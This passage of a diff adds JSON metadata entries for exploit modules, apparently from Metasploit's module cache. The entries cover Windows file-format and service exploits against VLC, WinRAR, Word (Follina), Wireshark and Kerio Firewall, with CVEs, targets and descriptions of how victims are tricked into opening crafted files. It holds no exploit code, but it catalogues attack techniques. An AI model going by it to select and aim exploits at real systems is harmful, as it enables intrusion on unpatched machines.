[], + "targets": [ + "VLC 1.1.8 on Windows XP SP3" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/fileformat/vlc_modplug_s3m.rb", + "is_install_path": true, + "ref_name": "windows/fileformat/vlc_modplug_s3m", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/fileformat/vlc_realtext": { + "name": "VLC Media Player RealText Subtitle Overflow", + "fullname": "exploit/windows/fileformat/vlc_realtext", + "aliases": [], + "rank": 400, + "disclosure_date": "2008-11-05", + "type": "exploit", + "author": [ + "Tobias Klein", + "SkD", + "juan vazquez " + ], + "description": "This module exploits a stack buffer overflow vulnerability in\n VideoLAN VLC < 0.9.6. The vulnerability exists in the parsing of\n RealText subtitle files.\n\n In order to exploit this, this module will generate two files:\n The .mp4 file is used to trick your victim into running. The .rt file\n is the actual malicious file that triggers the vulnerability, which\n should be placed under the same directory as the .mp4 file.", + "references": [ + "OSVDB-49809", + "CVE-2008-5036", + "BID-32125", + "URL-http://www.trapkit.de/advisories/TKADV2008-011.txt", + "URL-http://www.videolan.org/security/sa0810.html" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "VLC 0.9.4 on Windows XP SP3 / Windows 7 SP1" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/fileformat/vlc_realtext.rb", + "is_install_path": true, + "ref_name": "windows/fileformat/vlc_realtext", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/fileformat/vlc_smb_uri": { + "name": "VideoLAN Client (VLC) Win32 smb:// URI Buffer Overflow", + "fullname": "exploit/windows/fileformat/vlc_smb_uri", + "aliases": [], + "rank": 500, + "disclosure_date": "2009-06-24", + "type": "exploit", + "author": [ + "jduck " + ], + "description": "This module exploits a stack-based buffer overflow in the Win32AddConnection\n function of the VideoLAN VLC media player. Versions 0.9.9 through 1.0.1 are\n reportedly affected.\n\n This vulnerability is only present in Win32 builds of VLC.\n\n This payload was found to work with the windows/exec and\n windows/meterpreter/reverse_tcp payloads. However, the\n windows/meterpreter/reverse_ord_tcp was found not to work.", + "references": [ + "BID-35500", + "OSVDB-55509", + "CVE-2009-2484", + "URL-http://git.videolan.org/?p=vlc.git;a=commit;h=e60a9038b13b5eb805a76755efc5c6d5e080180f", + "EDB-9029" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "vlc 0.9.9 on Windows XP SP3" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/fileformat/vlc_smb_uri.rb", + "is_install_path": true, + "ref_name": "windows/fileformat/vlc_smb_uri", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/fileformat/vlc_webm": { + "name": "VideoLAN VLC MKV Memory Corruption", + "fullname": "exploit/windows/fileformat/vlc_webm", + "aliases": [], + "rank": 400, + "disclosure_date": "2011-01-31", + "type": "exploit", + "author": [ + "Dan Rosenberg" + ], + "description": "This module exploits an input validation error in VideoLAN VLC\n < 1.1.7. By creating a malicious MKV or WebM file, a remote attacker\n could execute arbitrary code.\n\n NOTE: As of July 1st, 2010, VLC now calls SetProcessDEPPoly to\n permanently enable NX support on machines that support it.", + "references": [ + "OSVDB-70698", + "CVE-2011-0531", + "BID-46060", + "URL-http://git.videolan.org/?p=vlc.git&a=commitdiff&h=59491dcedffbf97612d2c572943b56ee4289dd07&hp=f085cfc1c95b922e3c750ee93ec58c3f2d5f7456", + "URL-http://www.videolan.org/security/sa1102.html" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "VLC 1.1.6 on Windows XP SP3" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/fileformat/vlc_webm.rb", + "is_install_path": true, + "ref_name": "windows/fileformat/vlc_webm", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/fileformat/vuplayer_cue": { + "name": "VUPlayer CUE Buffer Overflow", + "fullname": "exploit/windows/fileformat/vuplayer_cue", + "aliases": [], + "rank": 400, + "disclosure_date": "2009-08-18", + "type": "exploit", + "author": [ + "MC " + ], + "description": "This module exploits a stack based overflow in VUPlayer <= 2.49. When\n the application is used to open a specially crafted cue file, a buffer is overwritten allowing\n for the execution of arbitrary code.", + "references": [ + "OSVDB-64581", + "BID-33960" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "VUPlayer 2.49" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/fileformat/vuplayer_cue.rb", + "is_install_path": true, + "ref_name": "windows/fileformat/vuplayer_cue", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/fileformat/vuplayer_m3u": { + "name": "VUPlayer M3U Buffer Overflow", + "fullname": "exploit/windows/fileformat/vuplayer_m3u", + "aliases": [], + "rank": 400, + "disclosure_date": "2009-08-18", + "type": "exploit", + "author": [ + "MC " + ], + "description": "This module exploits a stack over flow in VUPlayer <= 2.49. When\n the application is used to open a specially crafted m3u file, an buffer is overwritten allowing\n for the execution of arbitrary code.", + "references": [ + "CVE-2006-6251", + "OSVDB-31710" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "VUPlayer 2.49" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/fileformat/vuplayer_m3u.rb", + "is_install_path": true, + "ref_name": "windows/fileformat/vuplayer_m3u", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/fileformat/watermark_master": { + "name": "Watermark Master Buffer Overflow (SEH)", + "fullname": "exploit/windows/fileformat/watermark_master", + "aliases": [], + "rank": 300, + "disclosure_date": "2013-11-01", + "type": "exploit", + "author": [ + "metacom", + "Andrew Smith" + ], + "description": "This module exploits a stack based buffer overflow in Watermark Master 2.2.23 when\n processing a specially crafted .WCF file. This vulnerability could be\n exploited by a remote attacker to execute arbitrary code on the target\n machine by enticing a user of Watermark Master to open a malicious .WCF file.", + "references": [ + "OSVDB-99226", + "CVE-2013-6935", + "EDB-29327" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Windows 7 x32 - Watermark Master 2.2.23", + "Windows 7 x64 - Watermark Master 2.2.23" + ], + "mod_time": "2023-03-22 12:52:15 +0000", + "path": "/modules/exploits/windows/fileformat/watermark_master.rb", + "is_install_path": true, + "ref_name": "windows/fileformat/watermark_master", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [], + "SideEffects": [], + "Reliability": [] + }, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/fileformat/winamp_maki_bof": { + "name": "Winamp MAKI Buffer Overflow", + "fullname": "exploit/windows/fileformat/winamp_maki_bof", + "aliases": [], + "rank": 300, + "disclosure_date": "2009-05-20", + "type": "exploit", + "author": [ + "Monica Sojeong Hong", + "juan vazquez " + ], + "description": "This module exploits a stack based buffer overflow in Winamp 5.55. The flaw\n exists in the gen_ff.dll and occurs while parsing a specially crafted MAKI file,\n where memmove is used in an insecure way with user controlled data.\n\n To exploit the vulnerability the attacker must convince the victim to install the\n generated mcvcore.maki file in the \"scripts\" directory of the default \"Bento\" skin,\n or generate a new skin using the crafted mcvcore.maki file. The module has been\n tested successfully on Windows XP SP3 and Windows 7 SP1.", + "references": [ + "CVE-2009-1831", + "OSVDB-54902", + "BID-35052", + "EDB-8783", + "EDB-8772", + "EDB-8770", + "EDB-8767", + "URL-http://vrt-sourcefire.blogspot.com/2009/05/winamp-maki-parsing-vulnerability.html" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Winamp 5.55 / Windows XP SP3 / Windows 7 SP1" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/fileformat/winamp_maki_bof.rb", + "is_install_path": true, + "ref_name": "windows/fileformat/winamp_maki_bof", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/fileformat/winrar_ace": { + "name": "RARLAB WinRAR ACE Format Input Validation Remote Code Execution", + "fullname": "exploit/windows/fileformat/winrar_ace", + "aliases": [], + "rank": 600, + "disclosure_date": "2019-02-05", + "type": "exploit", + "author": [ + "Nadav Grossman", + "Imran E. Dawoodjee " + ], + "description": "In WinRAR versions prior to and including 5.61, there is path traversal vulnerability\n when crafting the filename field of the ACE format (in UNACEV2.dll). When the filename\n field is manipulated with specific patterns, the destination (extraction) folder is\n ignored, thus treating the filename as an absolute path. This module will attempt to\n extract a payload to the startup folder of the current user. It is limited such that\n we can only go back one folder. Therefore, for this exploit to work properly, the user\n must extract the supplied RAR file from one folder within the user profile folder\n (e.g. Desktop or Downloads). User restart is required to gain a shell.", + "references": [ + "CVE-2018-20250", + "EDB-46552", + "BID-106948", + "URL-https://research.checkpoint.com/extracting-code-execution-from-winrar/", + "URL-https://apidoc.roe.ch/acefile/latest/", + "URL-http://www.hugi.scene.org/online/coding/hugi%2012%20-%20coace.htm" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "RARLAB WinRAR <= 5.61" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/fileformat/winrar_ace.rb", + "is_install_path": true, + "ref_name": "windows/fileformat/winrar_ace", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/fileformat/winrar_cve_2023_38831": { + "name": "WinRAR CVE-2023-38831 Exploit", + "fullname": "exploit/windows/fileformat/winrar_cve_2023_38831", + "aliases": [], + "rank": 600, + "disclosure_date": "2023-08-23", + "type": "exploit", + "author": [ + "Alexander \"xaitax\" Hagenah" + ], + "description": "This module exploits a vulnerability in WinRAR (CVE-2023-38831). When a user opens a crafted RAR file and its\n embedded document, the decoy document is executed, leading to code execution.", + "references": [ + "CVE-2023-38831", + "URL-https://www.group-ib.com/blog/cve-2023-38831-winrar-zero-day/", + "URL-https://b1tg.github.io/post/cve-2023-38831-winrar-analysis/" + ], + "platform": "Windows", + "arch": "x64, x86", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Windows" + ], + "mod_time": "2024-05-28 14:01:31 +0000", + "path": "/modules/exploits/windows/fileformat/winrar_cve_2023_38831.rb", + "is_install_path": true, + "ref_name": "windows/fileformat/winrar_cve_2023_38831", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "Reliability": [ + "repeatable-session" + ], + "SideEffects": [ + "ioc-in-logs", + "artifacts-on-disk" + ] + }, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/fileformat/winrar_name_spoofing": { + "name": "WinRAR Filename Spoofing", + "fullname": "exploit/windows/fileformat/winrar_name_spoofing", + "aliases": [], + "rank": 600, + "disclosure_date": "2009-09-28", + "type": "exploit", + "author": [ + "chr1x", + "juan vazquez " + ], + "description": "This module abuses a filename spoofing vulnerability in WinRAR. The vulnerability exists\n when opening ZIP files. The file names showed in WinRAR when opening a ZIP file come from\n the central directory, but the file names used to extract and open contents come from the\n Local File Header. This inconsistency allows to spoof file names when opening ZIP files\n with WinRAR, which can be abused to execute arbitrary code, as exploited in the wild in\n March 2014", + "references": [ + "OSVDB-62610", + "BID-66383", + "URL-http://securityaffairs.co/wordpress/23623/hacking/winrar-zero-day.html", + "URL-http://an7isec.blogspot.co.il/" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Windows Universal" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/fileformat/winrar_name_spoofing.rb", + "is_install_path": true, + "ref_name": "windows/fileformat/winrar_name_spoofing", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/fileformat/wireshark_mpeg_overflow": { + "name": "Wireshark wiretap/mpeg.c Stack Buffer Overflow", + "fullname": "exploit/windows/fileformat/wireshark_mpeg_overflow", + "aliases": [], + "rank": 400, + "disclosure_date": "2014-03-20", + "type": "exploit", + "author": [ + "Wesley Neelen", + "j0sm1" + ], + "description": "This module triggers a stack buffer overflow in Wireshark <= 1.8.12/1.10.5\n by generating a malicious file.", + "references": [ + "CVE-2014-2299", + "URL-https://bugs.wireshark.org/bugzilla/show_bug.cgi?id=9843", + "URL-http://www.wireshark.org/security/wnpa-sec-2014-04.html", + "BID-66066" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "WinXP SP3 Spanish (bypass DEP)", + "WinXP SP2/SP3 English (bypass DEP)" + ], + "mod_time": "2022-01-23 15:28:32 +0000", + "path": "/modules/exploits/windows/fileformat/wireshark_mpeg_overflow.rb", + "is_install_path": true, + "ref_name": "windows/fileformat/wireshark_mpeg_overflow", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/fileformat/wireshark_packet_dect": { + "name": "Wireshark packet-dect.c Stack Buffer Overflow (local)", + "fullname": "exploit/windows/fileformat/wireshark_packet_dect", + "aliases": [], + "rank": 400, + "disclosure_date": "2011-04-18", + "type": "exploit", + "author": [ + "Paul Makowski", + "sickness", + "corelanc0d3r " + ], + "description": "This module exploits a stack buffer overflow in Wireshark <= 1.4.4\n When opening a malicious .pcap file in Wireshark, a stack buffer occurs,\n resulting in arbitrary code execution.\n\n Note: To exploit the vulnerability remotely with Scapy: sendp(rdpcap(\"file\")).", + "references": [ + "CVE-2011-1591", + "OSVDB-71848", + "URL-https://bugs.wireshark.org/bugzilla/show_bug.cgi?id=5838", + "URL-https://bugs.wireshark.org/bugzilla/show_bug.cgi?id=5836", + "EDB-17185" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Win32 Universal (Generic DEP & ASLR Bypass)" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/fileformat/wireshark_packet_dect.rb", + "is_install_path": true, + "ref_name": "windows/fileformat/wireshark_packet_dect", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/fileformat/wm_downloader_m3u": { + "name": "WM Downloader 3.1.2.2 Buffer Overflow", + "fullname": "exploit/windows/fileformat/wm_downloader_m3u", + "aliases": [], + "rank": 300, + "disclosure_date": "2010-07-28", + "type": "exploit", + "author": [ + "fdisk", + "dookie" + ], + "description": "This module exploits a buffer overflow in WM Downloader v3.1.2.2. When\n the application is used to import a specially crafted m3u file, a buffer overflow occurs\n allowing arbitrary code execution.", + "references": [ + "OSVDB-66911", + "EDB-14497" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Windows Universal" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/fileformat/wm_downloader_m3u.rb", + "is_install_path": true, + "ref_name": "windows/fileformat/wm_downloader_m3u", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/fileformat/word_msdtjs_rce": { + "name": "Microsoft Office Word MSDTJS", + "fullname": "exploit/windows/fileformat/word_msdtjs_rce", + "aliases": [], + "rank": 600, + "disclosure_date": "2022-05-29", + "type": "exploit", + "author": [ + "nao sec", + "mekhalleh (RAMELLA Sébastien)", + "bwatters-r7" + ], + "description": "This module generates a malicious Microsoft Word document that when loaded, will leverage the remote template\n feature to fetch an `HTML` document and then use the `ms-msdt` scheme to execute `PowerShell` code.", + "references": [ + "CVE-2022-30190", + "URL-https://www.reddit.com/r/blueteamsec/comments/v06w2o/suspected_microsoft_word_zero_day_in_the_wild/", + "URL-https://twitter.com/nao_sec/status/1530196847679401984?t=3Pjrpdog_H6OfMHVLMR5eQ&s=19", + "URL-https://app.any.run/tasks/713f05d2-fe78-4b9d-a744-f7c133e3fafb/", + "URL-https://doublepulsar.com/follina-a-microsoft-office-code-execution-vulnerability-1a47fce5629e", + "URL-https://twitter.com/GossiTheDog/status/1531608245009367040", + "URL-https://github.com/JMousqueton/PoC-CVE-2022-30190" + ], + "platform": "Windows", + "arch": "x86, x64", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Microsoft Office Word" + ], + "mod_time": "2024-05-28 14:01:31 +0000", + "path": "/modules/exploits/windows/fileformat/word_msdtjs_rce.rb", + "is_install_path": true, + "ref_name": "windows/fileformat/word_msdtjs_rce", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + "AKA": [ + "Follina" + ], + "Stability": [ + "crash-safe" + ], + "Reliability": [ + "unreliable-session" + ], + "SideEffects": [ + "ioc-in-logs", + "artifacts-on-disk" + ] + }, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/fileformat/word_mshtml_rce": { + "name": "Microsoft Office Word Malicious MSHTML RCE", + "fullname": "exploit/windows/fileformat/word_mshtml_rce", + "aliases": [], + "rank": 600, + "disclosure_date": "2021-09-23", + "type": "exploit", + "author": [ + "lockedbyte", + "klezVirus", + "thesunRider", + "mekhalleh (RAMELLA Sébastien)" + ], + "description": "This module creates a malicious docx file that when opened in Word on a vulnerable Windows\n system will lead to code execution. This vulnerability exists because an attacker can\n craft a malicious ActiveX control to be used by a Microsoft Office document that hosts\n the browser rendering engine.", + "references": [ + "CVE-2021-40444", + "URL-https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-40444", + "URL-https://www.sentinelone.com/blog/peeking-into-cve-2021-40444-ms-office-zero-day-vulnerability-exploited-in-the-wild/", + "URL-http://download.microsoft.com/download/4/d/a/4da14f27-b4ef-4170-a6e6-5b1ef85b1baa/[ms-cab].pdf", + "URL-https://github.com/lockedbyte/CVE-2021-40444/blob/master/REPRODUCE.md", + "URL-https://github.com/klezVirus/CVE-2021-40444" + ], + "platform": "Windows", + "arch": "x64", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Hosted" + ], + "mod_time": "2024-05-28 14:01:31 +0000", + "path": "/modules/exploits/windows/fileformat/word_mshtml_rce.rb", + "is_install_path": true, + "ref_name": "windows/fileformat/word_mshtml_rce", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "Reliability": [ + "unreliable-session" + ], + "SideEffects": [ + "ioc-in-logs", + "artifacts-on-disk" + ] + }, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/fileformat/xenorate_xpl_bof": { + "name": "Xenorate 2.50 (.xpl) Universal Local Buffer Overflow (SEH)", + "fullname": "exploit/windows/fileformat/xenorate_xpl_bof", + "aliases": [], + "rank": 500, + "disclosure_date": "2009-08-19", + "type": "exploit", + "author": [ + "hack4love ", + "germaya_x", + "loneferret", + "jduck " + ], + "description": "This module exploits a stack buffer overflow in Xenorate 2.50\n by creating a specially crafted xpl file.", + "references": [ + "OSVDB-57162", + "EDB-10371" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Windows XP SP2 / SP3" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/fileformat/xenorate_xpl_bof.rb", + "is_install_path": true, + "ref_name": "windows/fileformat/xenorate_xpl_bof", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/fileformat/xion_m3u_sehbof": { + "name": "Xion Audio Player 1.0.126 Unicode Stack Buffer Overflow", + "fullname": "exploit/windows/fileformat/xion_m3u_sehbof", + "aliases": [], + "rank": 500, + "disclosure_date": "2010-11-23", + "type": "exploit", + "author": [ + "hadji samir ", + "corelanc0d3r ", + "digital1", + "jduck ", + "m_101" + ], + "description": "This module exploits a stack buffer overflow in Xion Audio Player prior to version\n 1.0.126. The vulnerability is triggered when opening a malformed M3U file that\n contains an overly long string. This results in overwriting a\n structured exception handler record.", + "references": [ + "OSVDB-66912", + "EDB-14517", + "EDB-14633", + "EDB-15598" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Xion Audio Player v1.0.126 XP Universal" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/fileformat/xion_m3u_sehbof.rb", + "is_install_path": true, + "ref_name": "windows/fileformat/xion_m3u_sehbof", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/fileformat/xradio_xrl_sehbof": { + "name": "xRadio 0.95b Buffer Overflow", + "fullname": "exploit/windows/fileformat/xradio_xrl_sehbof", + "aliases": [], + "rank": 300, + "disclosure_date": "2011-02-08", + "type": "exploit", + "author": [ + "b0telh0 " + ], + "description": "This module exploits a buffer overflow in xRadio 0.95b.\n Using the application to import a specially crafted xrl file,\n a buffer overflow occurs allowing arbitrary code execution.", + "references": [ + "CVE-2008-2789", + "BID-46290", + "EDB-16141" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Windows Universal" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/fileformat/xradio_xrl_sehbof.rb", + "is_install_path": true, + "ref_name": "windows/fileformat/xradio_xrl_sehbof", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/fileformat/zahir_enterprise_plus_csv": { + "name": "Zahir Enterprise Plus 6 Stack Buffer Overflow", + "fullname": "exploit/windows/fileformat/zahir_enterprise_plus_csv", + "aliases": [], + "rank": 300, + "disclosure_date": "2018-09-28", + "type": "exploit", + "author": [ + "f3ci", + "modpr0be" + ], + "description": "This module exploits a stack buffer overflow in Zahir Enterprise Plus version 6 build 10b and below.\n The vulnerability is triggered when opening a CSV file containing CR/LF and overly long string characters\n via Import from other File. This results in overwriting a structured exception handler record.", + "references": [ + "CVE-2018-17408", + "EDB-45505" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Zahir Enterprise Plus 6 <= build 10b" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/fileformat/zahir_enterprise_plus_csv.rb", + "is_install_path": true, + "ref_name": "windows/fileformat/zahir_enterprise_plus_csv", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/fileformat/zinfaudioplayer221_pls": { + "name": "Zinf Audio Player 2.2.1 (PLS File) Stack Buffer Overflow", + "fullname": "exploit/windows/fileformat/zinfaudioplayer221_pls", + "aliases": [], + "rank": 400, + "disclosure_date": "2004-09-24", + "type": "exploit", + "author": [ + "Trancek ", + "aushack " + ], + "description": "This module exploits a stack-based buffer overflow in the Zinf Audio Player 2.2.1.\n An attacker must send the file to victim and the victim must open the file.\n Alternatively it may be possible to execute code remotely via an embedded\n PLS file within a browser, when the PLS extension is registered to Zinf.\n This functionality has not been tested in this module.", + "references": [ + "CVE-2004-0964", + "OSVDB-10416", + "EDB-7888", + "BID-11248" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Zinf Universal 2.2.1" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/fileformat/zinfaudioplayer221_pls.rb", + "is_install_path": true, + "ref_name": "windows/fileformat/zinfaudioplayer221_pls", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/firewall/blackice_pam_icq": { + "name": "ISS PAM.dll ICQ Parser Buffer Overflow", + "fullname": "exploit/windows/firewall/blackice_pam_icq", + "aliases": [], + "rank": 500, + "disclosure_date": "2004-03-18", + "type": "exploit", + "author": [ + "spoonm " + ], + "description": "This module exploits a stack buffer overflow in the ISS products that use\n the iss-pam1.dll ICQ parser (Blackice/RealSecure). Successful exploitation\n will result in arbitrary code execution as LocalSystem. This exploit\n only requires 1 UDP packet, which can be both spoofed and sent to a broadcast\n address.\n\n The ISS exception handler will recover the process after each overflow, giving\n us the ability to bruteforce the service and exploit it multiple times.", + "references": [ + "CVE-2004-0362", + "OSVDB-4355", + "URL-http://www.eeye.com/html/Research/Advisories/AD20040318.html" + ], + "platform": "Windows", + "arch": "", + "rport": 1, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Bruteforce", + "Bruteforce iis-pam1.dll", + "Bruteforce NT 4.0", + "iis-pam1.dll 3.6.06", + "iis-pam1.dll 3.6.11", + "WinNT SP3/SP4/SP5", + "WinNT SP4/SP5", + "WinNT SP5/SP6 - advapi32", + "WinNT SP3/SP5/SP6 - shell32", + "WinNT SP5/SP6 - mswsock", + "WinXP SP0/SP1 - shell32", + "WinXP SP0/SP1 - atl", + "WinXP SP0/SP1 - atl", + "WinXP SP0/SP1 - ws2_32", + "WinXP SP0/SP1 - mswsock", + "Windows 2000 Pro SP4 English", + "Win2000 SP0 - SP4", + "Win2000 SP2/SP3 - samlib", + "Win2000 SP0/SP1 - activeds", + "Windows XP Pro SP0 English", + "Windows XP Pro SP1 English", + "WinXP SP0 - SP1", + "Win2003 SP0" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/firewall/blackice_pam_icq.rb", + "is_install_path": true, + "ref_name": "windows/firewall/blackice_pam_icq", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/firewall/kerio_auth": { + "name": "Kerio Firewall 2.1.4 Authentication Packet Overflow", + "fullname": "exploit/windows/firewall/kerio_auth", + "aliases": [], + "rank": 200, + "disclosure_date": "2003-04-28", + "type": "exploit", + "author": [ + "MC " + ], + "description": "This module exploits a stack buffer overflow in Kerio Personal Firewall\n administration authentication process. This module has only been tested\n against Kerio Personal Firewall 2 (2.1.4).", + "references": [ + "CVE-2003-0220", + "OSVDB-6294", + "BID-7180" + ], + "platform": "Windows", + "arch": "", + "rport": 44334, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Windows 2000 Pro SP4 English", + "Windows XP Pro SP0 English", + "Windows XP Pro SP1 English" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/firewall/kerio_auth.rb", + "is_install_path": true, + "ref_name": "windows/firewall/kerio_auth", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/ftp/32bitftp_list_reply": { + "name": "32bit FTP Client Stack Buffer Overflow ", + "fullname": "exploit/windows/ftp/32bitftp_list_reply", + "aliases": [], + "rank": 400, + "disclosure_date": "2010-10-12", + "type": "exploit", + "author": [ + "fancy", + "corelanc0d3r " + ], + "description": "This module exploits a stack buffer overflow in 32bit ftp client, triggered when trying to\n download a file that has an overly long filename.", + "references": [ + "OSVDB-68703", + "URL-http://www.corelan.be:8800/index.php/2010/10/12/death-of-an-ftp-client/" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "XP Universal" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/ftp/32bitftp_list_reply.rb", + "is_install_path": true, + "ref_name": "windows/ftp/32bitftp_list_reply", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/ftp/3cdaemon_ftp_user": { + "name": "3Com 3CDaemon 2.0 FTP Username Overflow", + "fullname": "exploit/windows/ftp/3cdaemon_ftp_user", + "aliases": [], + "rank": 200, + "disclosure_date": "2005-01-04", + "type": "exploit", + "author": [ + "hdm ", + "otr" + ], + "description": "This module exploits a vulnerability in the 3Com 3CDaemon\n FTP service. This package is being distributed from the 3Com\n web site and is recommended in numerous support documents.\n This module uses the USER command to trigger the overflow.", + "references": [ + "CVE-2005-0277", + "OSVDB-12810", + "OSVDB-12811", + "BID-12155" + ], + "platform": "Windows", + "arch": "", + "rport": 21, + "autofilter_ports": [ + 21, + 2121 + ], + "autofilter_services": [ + "ftp" + ], + "targets": [ + "Automatic", + "Windows 2000 English", + "Windows XP English SP0/SP1", + "Windows NT 4.0 SP4/SP5/SP6", + "Windows 2000 Pro SP4 French", + "Windows XP English SP3" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/ftp/3cdaemon_ftp_user.rb", + "is_install_path": true, + "ref_name": "windows/ftp/3cdaemon_ftp_user", + "check": true, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/ftp/aasync_list_reply": { + "name": "AASync v2.2.1.0 (Win32) Stack Buffer Overflow (LIST)", + "fullname": "exploit/windows/ftp/aasync_list_reply", + "aliases": [], + "rank": 400, + "disclosure_date": "2010-10-12", + "type": 